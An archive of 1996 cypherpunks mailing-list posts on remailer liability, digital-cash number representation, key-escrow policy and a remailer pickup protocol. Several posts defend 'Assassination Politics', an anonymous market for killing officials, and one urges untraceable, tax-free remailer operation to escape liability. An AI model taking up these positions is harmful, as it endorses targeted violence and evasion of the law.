     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 23 May 1996 13:29:29 +0800
To: David Rosoff <drosoff@arc.unm.edu>
Subject: Re: An alternative to remailer shutdowns (fwd)
Message-ID: <199605222104.OAA06174@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 PM 5/22/96 -0600, David Rosoff wrote:

>>But even "knowingly" needs to be carefully defined.  A remailer operator 
>>today KNOWS that his system COULD be used for illegal activities; he merely 
>>doesn't know that they are, currently.  I think that the definition should 
>>be so narrow that it is impossible for a third party (or the government 
>>itself)  to incriminate the remailer operator by having his system forward 
>>arguably illegal or copyright-violating material.
>>
>>
>>Jim Bell
>>jimbell@pacifier.com
>
>Can the same sort of standards as per the U.S. CDA be applied? The first
>draft of the
>CDA would have held ISP's responsible for, e.g., porn transmitted using their 
>services. Isn't this the same sort of thing - that is, that remailer
>operators provide a service, and they cannot be held responsible for people who abuse that
>service? I think that this line of thought is reasonable.

"Reasonable," yes.  But remailers provide a service that governments won't 
consider politically popular; ISP's provide a nominally popular service.  
The government will find a way to interpret the actions of a remailer 
entirely differnetly than that of an ISP.   Sigh.



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 23 May 1996 08:49:27 +0800
To: declan+@CMU.EDU>
Subject: Re: FTC online workshop on privacy
In-Reply-To: <01I4ZKWPMI7K8Y5IL9@mbcl.rutgers.edu>
Message-ID: <klcpb=W00YUzQG9W5E@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 22-May-96 Re: FTC online workshop on
.. by Declan McCullagh@CMU.EDU 
> The legislation being introduced at 10:30 am will restrict selling
> mailing lists with childrens' names and other identifying info on them,
> including email lists. Another attempt to regulate the net, or a good
> thing?

Whoops. I should have said the press conference happened at 10:30 am.
The bill will be introduced in both houses later this  week.

Interesting press conference. Enough is Enough! took quite a bit of time
to rant about the dangers of the Internet. Pedophiles, chat rooms,
illegal pornography.

You get the idea.

Did you know May 20-26 is "Safe Cyber Week?"

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 23 May 1996 14:24:30 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: The Twilight of the Remailers?
In-Reply-To: <199605220316.UAA18744@netcom2.netcom.com>
Message-ID: <9605221917.AA00675@nwk2_ocalsl>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos writes:
>  Contrast this with a DC-Net of boxes which can covertly inject
>  packets into the Net, in some untracable manner.  Now we have
>  no identifiable "Hal" to be harrassed, and no one for the
>  Clams to aim their lawyers at.

While this is a nice thought, it is incorrect.  You can't "covertly inject  
packets into the Net, in some untraceable manner."  The output of the DC net  
is simply a block of random-looking bits for each member of the net.  Someone  
must XOR each of the blocks together before the message is readable.  If the  
addressee is not personally watching the DC-net and assembling all the  
blocks looking for a message, someone else must do that and put it out on the  
Internet (via e-mail, usenet, IRC, etc...).  That someone is the person who  
is going to take the heat for the massage.  It is exactly the same situation  
as with current remailers:  someone gets mail they don't like, they trace it  
back as far as possible (i.e., to the remailer operator).  The last person  
holding the 'hot-potato' gets burned.


Since it looks like the "everyone's a remailer" dream is not becoming a  
reality, the key to successful remailers is to make the *operators*  
untraceable as well.   If you can't trace the operator, you can't hold them  
liable.  We have discussed techniques for doing this before:  cash paid  
accounts, using dialups (possibly from a public phone).  The remailer must be  
a 'sacrificial cow' that can be snatched up by 'authorities' at any time.

Because it takes considerable time, effort, and money to setup and run a  
remailer that is untraceable to the operator, there must be compensation.   
The solution is a typical cypherpunk one: Digital cash postage that is  
collected by the remailer, encrypted with a public key, and posted to  
alt.anonymous.messages.  Our untraceable remailer operator sits back and  
collects the cash until the remailer is forcibly shut-down.  Then he starts  
up a new one (assuming this is profitable).

While I haven't actually had experience running a remailer, I can imagine  
that the hassle of initially setting up the remailer in an untraceable manner  
may actually be less than the hassle of dealing with complaints.


The age of remailers with publically known operators is drawing to a close.   
Basically the only missing link is the digital postage.  If we get that,  
then being an anonymous remailer operator could be the first cryptoanarchist  
job that basically anyone can get and where you can collect money completely  
untraceably and tax-free.  To me that seems like a big step towards the  
future that many of us have been discussing for the past few years.  A very  
exciting prospect.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 08:48:28 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960522141400.00340478@mail.pi.se>
Message-ID: <199605221857.OAA23701@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Matts Kallioniemi writes:
> What do you think will happen if you have a one italian lira coin and
> you try to deposit it with Mark Twain's USD account? With integer
> math it won't be pretty.

Fixed point math is not ugly. It is the only way to go if you are
representing currency and thus cannot afford loss of precisions -- and
isn't particularly onerous to use.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 16:33:54 +0800
To: R.Hirschfeld@cwi.nl
Subject: Re: The Crisis with Remailers
In-Reply-To: <9605221739.AA03647=ray@groen.cwi.nl>
Message-ID: <199605221904.PAA23720@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



R.Hirschfeld@cwi.nl writes:
> Despite the ugliness of floating point arithmetic (lack of
> associativity, for example) and my general distaste for it, I would
> have to agree that 64-bit floats are higher precision than 32-bit
> fixed-points, since more than half the bits are mantissa.

However, accounting systems DO NOT use 32 bit fixed point arithmetic.

One client of mine had around $10Billion under management. Do you
think they were doing their accounting on a system that could only
deal with fixed point numbers of 45Million or so? Hell, individual
trades are larger.

Floating point systems are built to do approximate math on a very wide
range of number sizes. Accounting systems require exact math -- down
to the cent. Floats aren't suitable.

Anyone who needs to understand why should go off and read Knuth,
Volume 2.

{erru




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 23 May 1996 13:36:13 +0800
To: cypherpunks@toad.com
Subject: Re: Clipper III analysis
In-Reply-To: <199605221756.KAA01022@netcom8.netcom.com>
Message-ID: <v0300661badc9163cace1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:58 PM  -0400 5/22/96, Bill Frantz wrote:

> John Gilmore wrote an excellent description of GAK 3
                                                 ^^^^^
I think we have a winner, folks! GAK3 it is...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 10:20:57 +0800
To: cypherpunks@toad.com
Subject: ecash representation
Message-ID: <199605221908.PAA23731@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



In my last article, I slightly screwed up.

A signed 32 bit fixed point number, with two places of precision (less
than you need when calculating things like interest and what have you,
but lets be generous) has a maximum representation of even less than I
off the cuffed -- a mere 21,474,836.48. This is hardly sufficient for
accounting. However, floating point is even less useful.

.pm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 23 May 1996 11:56:07 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Feds Web Crypto
In-Reply-To: <199605201549.IAA00569@jobe.shell.portal.com>
Message-ID: <199605222028.PAA15709@homeport.org>
MIME-Version: 1.0
Content-Type: text


I'm suprised no one has pointed out that this could mean all
confidential communication with the government, such as paying your
taxes, will require a $95 Fortezza card.

Of course, you could then use that card to encrypt your credit card
numbers and email, as well.

Label this Clipper IV.

Adam


anonymous-remailer@shell.portal.com wrote:
| 
| 
| Washington Post, May 20, 1996
|  
| Feds on the Web 
|  
| Federal agencies' efforts to link up with the citizenry over 
| the World Wide Web take a step forward today. Officials plan 
| to announce a pilot program in which 1,000 to 2,000 people 
| will try their hands at secure Web transactions with federal 
| agencies. It's set to start later this month. 
|  
| The vision for the "Paperless Transactions for the Public 
| Project": a taxpayer files a return to the Internal Revenue 
| Service over Web links that use advanced cryptography to 
| confirm to the agency that the return's really coming from the 
| right party. Or, a retiree goes into a Social Security 
| Administration computer to check benefit information. 
|  
| VIPs, civil servants and ordinary folks are to be issued 
| special "key cards" to take part in the test, which will use 
| cryptography from Frontier Technologies Corp., a Wisconsin 
| networking company. Officials promise the vision is not that 
| far away. 
|  
| -- 
|  
|  
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Thu, 23 May 1996 11:21:26 +0800
To: cypherpunks@toad.com
Subject: Number one story on CNN this hour.
Message-ID: <Pine.BSI.3.91.960522153155.264g-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


There are 40 million 'attack capable' systems connected to the Internet 
and over 120 countries have developed or are developing 'attack software'.

[BTW, there will be a BUNCH more attacking systems when 'a new protocol 
is deployed because they are running out of addresses']

Sheesh.

-abc
                                      \             Alan B. Clegg
         Just because I can            \         Network Technologist
        does not mean I will.           \          gateway.com, inc.
                                         \     <http://www.gateway.com/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Thu, 23 May 1996 03:41:16 +0800
To: bryce@digicash.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960522141400.00340478@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 11:58 1996-05-22 +0200, bryce@digicash.com wrote:
>Matts, _floating_ point numbers  are _not_ useful 
>if you want to handle a number with a lot of precision, nor
>indeed, if you want to be able to _know_ the precision!  If you
>have a number that represents money, you want to know the 
>precision!

As I said yesterday, there are in fact people dealing with billions
in all major currencies that keep their money in 64 bit floats. The
precision is far better than anything you can do in 32 bit integers.
Trust me, this is a fact and can easily be proven.

>I shall try to refrain from taking umbrage at your comment that
>DigiCash is "not real".  

The "get real" was a pun on floats. Many languages, such as Pascal,
calls them real numbers. Sorry I forgot the smiley.

>Also that DigiCash doesn't "do" currency.  What could you possibly
>mean by that?

In my client (2.1.5a MT) there is no way to do currency conversion.
If I go to a FIM or DEM merchant I can't buy anything in the store.

This will probably change in the near future when a new client is
released, and then we'll have the question of how to represent these
currencies in one wallet.

What do you think will happen if you have a one italian lira coin and
you try to deposit it with Mark Twain's USD account? With integer
math it won't be pretty.

>For further reading on floating point and other representations
>of numbers in computing, I recommend any good introductory
>university text on mathematical computing.  Sorry I don't have
>mine handy or I'd give you a specific reference.

Maybe you should start looking for it. You'll need it when the lira
arrives...


Regards,

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Deters <jad@dsddhc.com>
Date: Thu, 23 May 1996 11:04:27 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
Message-ID: <2.2.32.19960522214836.003432fc@labg30>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 PM 5/22/96 -0400, Perry wrote:
>
>Matts Kallioniemi writes:
>> At 17:44 1996-05-21 +0200, bryce@digicash.com wrote:
>> >Matts, you don't want to do floating point for money, because
>> >floating point doesn't give you good control of precision.
>> 
>> Yes I do. Several major currency traders in Sweden keep all
>> their money in 64 bit floating point storage.
>
>I have trouble believing you. None of the forex accounting I know of
>in the U.S. is done in floating point. It simply isn't accurate
>enough.
>
>It is true enough that *rates* can be stored as floats if you want,
>but never actual sums.

I wish there were a hard-and-fast rule that this were true.  I work in
Point Of Sale (POS or cash registers), and occasionally we will see a vendor
whose software stores money/currency in floating point data types.  I try
very hard to make sure we do not purchase their software, because this
implies the most gross lack of understanding imaginable.

Floating points are simply not accurate when you're performing math on
other people's money.

And, yes, rates are acceptable to store and use as floats, but even the
conversion process ultimately yields a long, not a float.  And, we usually go
out of our way to code rates up as integers and perform the decimal point
shifting in code.

In the currency class we use, we have an exponent property that defines where
the decimal point is.  I imagine that by converting the exponent from a short
to a long we could even handle lira!  :-)  *

* Note to persons who respect the Italian economy**:  That was a joke!

** Note to persons who believe there are people who respect the Italian economy:
   That was a joke!

-john
--
J. Deters
>From Senator C. Burns' Pro-CODE bill, which I support and you can find at:
http://www.senate.gov/member/mt/burns/general/billtext.htm
"  (2) Miniaturization, disturbed computing, and reduced transmission
 costs make communication via electronic networks a reality."
+---------------------------------------------------------+
| NET:     jad@dsddhc.com (work)    jad@pclink.com (home) |
| PSTN:    1 612 375 3116 (work)    1 612 894 8507 (home) |
| ICBM:  44^58'33"N by 93^16'42"W Elev. ~=290m (work)     |
| PGP Key ID:  768 / 15FFA875                             |
+---------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Thu, 23 May 1996 04:05:39 +0800
To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960522141400.00340478@mail.pi.se>
Message-ID: <199605221451.QAA27787@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hi again Matts,


This conversation has been thorough enough already that perhaps
it is time to take it off-lists.  I think that you are unaware
of the difference between floating point numbers (e.g. the 'IEEE
754' 32 bit floating point number spec) and fixed-point
numbers which are used to represent amounts other than "units"
of a thing.  (E.g., use a 32-bit integer and say that it
represents millionths of an apple.  You can now represent
anything from 0.000001 apples to 4294.967295 apples with no loss
of precision.)


There are also many other ways to represent different kinds of 
numbers, including multi-precision integers and rationals, 
imaginary and complex numbers, etc.  I reiterate that floating 
point numbers are for convenience when dealing with values whose 
precision is unimportant.  Anyone who encodes real money into
a float is dumb.


> What do you think will happen if you have a one italian lira coin and
> you try to deposit it with Mark Twain's USD account? With integer
> math it won't be pretty.


It will be _very_ pretty.  Stay tuned.  :-)


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMaMp1kjbHy8sKZitAQFlBwMAwhwLBvPvKMwjzWMj/HMDrzlws9CRwPxd
ylBIIWCnaChUafO9Gbjptd12A+nRlwgMJ27N+aY5GCcUu6jlVZz2j7jtxOqMMwNm
VFHs0itk7hotPGAoFBF4i4iB0YG1C0Ih
=y5zo
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 23 May 1996 11:08:50 +0800
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <9605222053.AA24683@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Take note: If you want me to read you, cc me since I unsubscriVed :)
from Cypherpunks...

While frothing at the mouth (and god knows what other sphincters...), 
on a 22 May 96 at 12:37, somebody that behaves like a Rotweiller 
wrote:

> oh, so in other words, a lot of "innocent" people will be murdered
> under AP. ah, another great "feature", not a "bug", right??

Yes, but please note that the point for the validating of his statement 
is that even if this will happens, overall, *less innocents* will 
suffer from the seemingly random violence of AP than from the actual 
system.  He might be wrong, but you seem to bring no new knowledge 
that would elucidate the question.

Should the US have not dropped the A-Bomb on Japan and let happen 10 
times mores casualties (from both sides)?

The following paragraphs illustrate very well the way our local 
Rotweiller sees the world, which is very close to the vision of most 
statists.

> ah, like murder. I see.  well, I think you are violating my rights
> by disagreeing with me. I shall arrange your consequences
> accordingly.


> but who decides what is wrong? the arbitrary opinion of some single
> human idiot out anywhere in the world? don't you see the tyranny of
> this?

> it is far worse than the tyranny of a government if I were to
> be killed by someone who believes that I violated his rights by
> breathing air particles or whatever. via AP, you wish to give him
> the mechanism to murder me without trace. 

Why do you fear so much for yourself?  I guess, thoses who want to 
murder for all sort of reasons like hunting white baby seals or 
smoking in public simply share your psycho-epistemology.  They would 
have no reasons to put a contract on you.  Or would they anyways?

> deny rights, legitimacy, justice, blah, blah, blah. the terms you
> use have no meaning in the system you are advocating. there are no
> "rights" in an anarchy, because a government is the entity created
> to safeguard/protect them. all actions are legitimate in an
> anarchy, because there is no civilized system that rejects any ones
> in particular.

By definition, you are right.  But note that *they* never advocated
true anarchy, only *you* claim that they do.

Their vision of Life clearly entail some vision of Rights, Rules of 
Conduct, etc.  They did *not* rule out laws, they only said that they 
do not like laws that are there to oppress peoples.  Now, might you 
say, how are you gonna know?  Because your philosophy is somewhat of 
a cross between Nietche and Sartre, you see no way out.  But they 
(proponents of AP) have a vision of life that value, as the good old 
american constitution say, life, liberty and "pursuit of happiness".

I might even agree with you, dear Rotty, that Jim Bell is a bit
naive and shows a kind of outdated philosophy.  Jim Bell et al. 
entertain the delusion that human beings are intrinsically joyous 
rationnal animals that, most of the time, love life.  Therefore, for 
them, the AP scheme cannot lead to anything but a kind of 
laissez-faire world where everybody would be able to pursue happiness 
to the best of their abilities.  

OTOH, you believe that the natural tendency of AP would bring a
world as you describe it vocally here.  A world where the essence of
Mankind is not to be a rationnal animal, but an animal, period.  In
that vision, you believe that a bloodthirsty beast within us will
always take over.  Maybe you learned that truth from your *own* life
experience, I have no idea.  So, according to your logic, anybody
who doesn't like you will put a prize on your head, and probably look
up the necrology section of the paper everyday while gigling.  And
here, I have to conceed that you may be right.

After all, what philosophy ran the country since a hundred years?
Huhh?  So many peoples are so convinced of that that AP might very 
well turn against it's originator and further corruption.  Don't you 
think so?  

> if you think that a government is a tyranny, perhaps you are not
> aware of the tyranny of the irrationality of individual men.

That sentence should earn one of the top spot of the CP
top-ten-of-the-year list! ROTFL and L and L and L !

> it will "work" exactly as anonymous murdering now works.

Nobody is more deaf than the blind who does not want to smell...

> ah yes, exactly what we need. "enhanced anarchy". you and TCM really
> should get together and collaborate. I'm sure you'd come up with
> some fruitful conclusions.

Who knows?

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 23 May 1996 14:15:27 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605222051.NAA20284@netcom21.netcom.com>
Message-ID: <Pine.3.89.9605221613.A21952-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 22 May 1996, Mike Duvos wrote:

> Perry Writes:
> 
> > Floating point systems are built to do approximate math on a very wide
> > range of number sizes. Accounting systems require exact math -- down
> > to the cent. Floats aren't suitable.
> 
> Calling floating point math "approximate" is a bit of a misnomer.  
> Floating point numbers all correspond to exact points on the real 
> number line.  The floating point number taken as the result of an 
> operation, if that result is not another floating point number, is 
> always chosen consistantly in a way which has minimum error and zero
> bias. 

If floating point is implemented properly in *both* hardware and 
software, then the claim is valid. I have seen too many instances of 
floating point support and/or emulation from people like MS and Borland 
that would scare the bejeebers out of most competent programmers

> 
> Floating point numbers can be used to do exact integer arithmetic
> quite easily.  A 48 bit mantissa can represent 14 decimal digit signed
> integers with no loss of precision, and $999,999,999,999.99 is more
> than enough magnitude for most bean counters. 
> 

Again, exact integer artimetic derived from floating point is dependant 
on how well the floating point "behaves". Mainframes dont suffer the same 
fate as some of the uP's do.

> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.        7              $
> 
> 
> 

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 23 May 1996 11:27:58 +0800
To: jim bell <jimbell@pacifier.com>
Subject: PROPOSAL
In-Reply-To: <199605211950.MAA11596@mail.pacifier.com>
Message-ID: <Pine.SUN.3.93.960522170222.15860A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 21 May 1996, jim bell wrote:

> At 04:28 PM 5/20/96 +0000, Jean-Francois Avon wrote:  [quoting Jim Ray>>]
> 
> >Interesting.  Has AP ever popped-up in the conventional medias?
> 
> Other than the article I quote in its entirety in Part 8 of AP, an article 
> from the Asahi Evening News (an english-language daily newspaper in
> Japan), no.

[Yadda Yadda Yadda]

Motion: To create the alt.politics.assassination.politics newsgroup and
the "AP" mailing list so as to clear the meaningless traffic (for which I
am significantly responsible) out of this forum.

Any seconds?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 10:41:12 +0800
To: R.Hirschfeld@cwi.nl
Subject: Re: The Crisis with Remailers
In-Reply-To: <9605222009.AA04459=ray@groen.cwi.nl>
Message-ID: <199605222104.RAA23933@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



R.Hirschfeld@cwi.nl writes:
> > Date: Wed, 22 May 1996 15:04:04 -0400
> > From: "Perry E. Metzger" <perry@piermont.com>
> > 
> > Floating point systems are built to do approximate math on a very wide
> > range of number sizes. Accounting systems require exact math -- down
> > to the cent. Floats aren't suitable.
> 
> I completely agree.  But are the usual fixed-point representations
> adequate for exchange rates, where it's not a matter of "down to the
> cent" but of ratios of cents and centimes?

It depends on the number of significant figures you need to
represent. Forex usually involves numbers with five significant
figures, which can be represented fairly conveniently in fixed point.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 23 May 1996 12:32:48 +0800
To: vznuri@netcom.com
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <01I50J36B3OG8Y4X9G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"vznuri@netcom.com"  "Vladimir Z. Nuri" 22-MAY-1996 15:50:29.93
To:	IN%"EALLENSMITH@mbcl.rutgers.edu"  "E. ALLEN SMITH"
CC:	IN%"vznuri@netcom.com", IN%"cypherpunks@toad.com"
Subj:	RE: (Fwd) Re: TCM: mafia as a paradigm for cyberspace

Received: from netcom11.netcom.com by mbcl.rutgers.edu (PMDF #12194) id
 <01I50FPCUY748WW02X@mbcl.rutgers.edu>; Wed, 22 May 1996 15:50 EDT
Received: from localhost (vznuri@localhost) by netcom11.netcom.com
 (8.6.13/Netcom) id MAA29965; Wed, 22 May 1996 12:52:08 -0700
Date: Wed, 22 May 96 12:52:07 -0700
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: RE: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-reply-to: Your message of "Wed, 22 May 96 00:57:00 EDT."
 <01I4ZKIOEV7G8Y5IL9@mbcl.rutgers.edu>
To: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Cc: vznuri@netcom.com, cypherpunks@toad.com
Message-id: <199605221952.MAA29965@netcom11.netcom.com>
X-Envelope-to: EALLENSMITH


>I will quote an anonymous AP proponent with the initials EAS

>>>the above sentence I find absolutely abhorrent: it justifies killing,
>>>not merely because of the effect (the sort of "ends-justifies-the-means"
>>>argument used by most here), but that in addition it is 
>>>supposedly "ethical". ethical?!?!? for g*d's sakes, promote your
>>>depraved scheme under any other heading, but do not claim it is
>>>"ethical" unless you want to further demonstrate how far from
>>>morality you have twisted your brain.
>>
>>	In other words, if I'm shooting at you, it's unethical for you to
>>shoot back?

	The above is evidence that your accusing anyone of reposting private
email is the pot calling the kettle black, LD (unless, as Dr. Vulis said,
you're too dumb to be him). That was specifically sent in private email, for
the simple reason that I saw no reason to clutter up the list with another
response like the 10 others that had been sent. 

>get a clue. I didn't argue against someone shooting at you. I argued
>against the claim that you should be allowed to shoot anyone in
>the government because you think the government is corrupt.

	Nobody, so far as I know, is arguing that one ought to shoot anyone
in the government... I'd be in danger if that were the case, given that my
current employer is a state university. If someone is in government and is
doing something very wrong (although one may disagree on what is wrong, of
course), then they're a proper target.

>>I do achnowledge the rightness of self-defense against governmental evildoing.

>ah, now there's where the silly non-sequitur of AP proponents comes
>in. "the government is corrupt, therefore we should be able to shoot
>any government employees we choose". the government is not sticking
>a gun down your throat this minute, are they? well, why are you
>seriously contemplating the converse? oh, you say that FIGURATIVELY
>the government is doing this to you? and you want to respond
>LITERALLY? I wonder who is the tyrant in this situation?

	If the only workable method of self-defense is to kill the person, then
that's a justifiable means of self-defense. Hopefully, other means of removal
of those in government who do what is wrong is possible; I do my best to work
for this. But if it isn't, I'll support AP as an alternative.

>>To use your
>>example of Hitler, somehow I think an assasination of him would have been
>>ethical.

>I used him as an example of the kind of thinking that "murdering your
>enemies solves all your problems". yes, that was his point of view, and
>you inform me that you share it? well, congratualations!! hitler
>doesn't have too many friends and can use all the sympathy he can get.

	All your problems? No. But leaving it out as a possible partial
solution is irrational.

>murdering Hitler would not have
>solved all the problems of WWII. the problem was militarism that
>was embodied by many cultures outside of his own, e.g. Japan and
>Russia.

	Executing Hitler would have saved a lot of lives, even if it didn't
stop the war entirely. Germany without him would, more than likely, not have
held together nearly as long as it did.

>AP proponents believe that:

>1. the world is full of people that are part of the problem or part
>of the solution

>2. I can tell precisely the difference

	No, I don't think that I can tell precisely the difference. But it
appears possible that I'd make less mistakes than the current government does,
even considering only the cases in which they do kill people (e.g., shootouts
with drug dealers et al).

>3. I'd like to kill those that are part of the problem.

	If that's the only way that works, yes.

>4. if AP existed, and it appeared there was a way to kill other people
>without trace, I would go through with it.

	Again, if that's the only way that works, yes.

>5. I have a lot of teachers I hated in my childhood too. I think I
>will go for them next. possibly not before seeing if they beg for mercy.

	I invite you to look at the psychological defense mechanism known as
projection, preferably along with a trained psychiatrist or clinical
psychologist in inpatient therapy.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant, ULC" <mark@unicorn.com>
Date: Thu, 23 May 1996 06:41:28 +0800
To: cypherpunks@toad.com
Subject: Re: Bit tax proposal?
Message-ID: <Pine.3.89.9605221732.A29209-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



>      All interactive digital information would be subject to the new tax.
> Thus digital broadcast and digital radio (all 'one to many' broadcasts)
> would be exempted from the tax. 

Gosh, so the TV and radio companies would get to broadcast tax-free and
the rest of us would have to pay. Not like this is intended to turn the
scary old Internet into the digital equivalent of the broadcast media. 
I'm sure that idea never even considered crossing their minds...

Hmm, maybe "Cypherpunks Productions" should start broadcasting soap operas
and gameshows with email and Usenet stego-ed into the low bits. 

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 24 May 1996 02:13:24 +0800
To: cypherpunks@toad.com
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605231304.GAA13631@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:05 PM 5/21/96 -0500, you wrote:
>To make it easy, how about a two part MIME message with the key and the 
>PGP-encrypted message.  The message text would be directions on opening 
>it up, and breaking the "seal", which constitutes acceptance of the 
>remailer terms...

Is that really any different than delivering the message rot-13?
One of the reasons people object to getting anonymous email is spam;
sending "You have mail; pick up message-id #2718281828 by midnight tonight!"
encourages you to go to some effort to pick up the message,
so you'll be even more annoyed if it's spam.  Similarly, for hate-mail.

PROPOSAL
--------
On the other hand, a pickup system could reduce directed spam,
if people generally don't pick up remailer pickups unless they recognize
the messageid, leaving the remailer system to people who actually
want to communicate with each other anonymously, which _had_ been one
of the original goals of remailer systems.  

Protocol support requirements:?  We could build in a fancy header,
or we could just use the Subject: line, which many remailers know
how to paste in anyway, and let the remailer do a messageid.
Response mechanisms should probably be an email message to the remailer
        ::
        Deliver-Message: 2718281828
A secondary concern is handling multi-casts - should the remailer 
create one copy for each recipient (secure, easy, space-wasteful),
or should it try to get fancy and keep the message for N recipients or D days?
Two ways to implement the fancy version are to keep a flag that says
not to delete the article upon receipt, while the normal behavior deletes it,
or to use different keywords for picking up delete-after-pickup and shared
messages.

NEGATIVES
---------
The big negatives with this approach are that it doesn't support PGP-encrypted
messages, since they don't easily fit into one line, while they also encourage
people to forget that the header of their message will be delivered insecurely.
But it's probably close enough for non-anti-government work.

Of course, it also doesn't do chaining; that either needs to be implemented
by recognizing well-known remailers and forwarding directly instead of
pickup, or
by using a standard message format, so other remailers could do pickup.
It's probably worth doing both, to support other remailer types transparently
and to allow remailers to use pickups without having to be well-known.
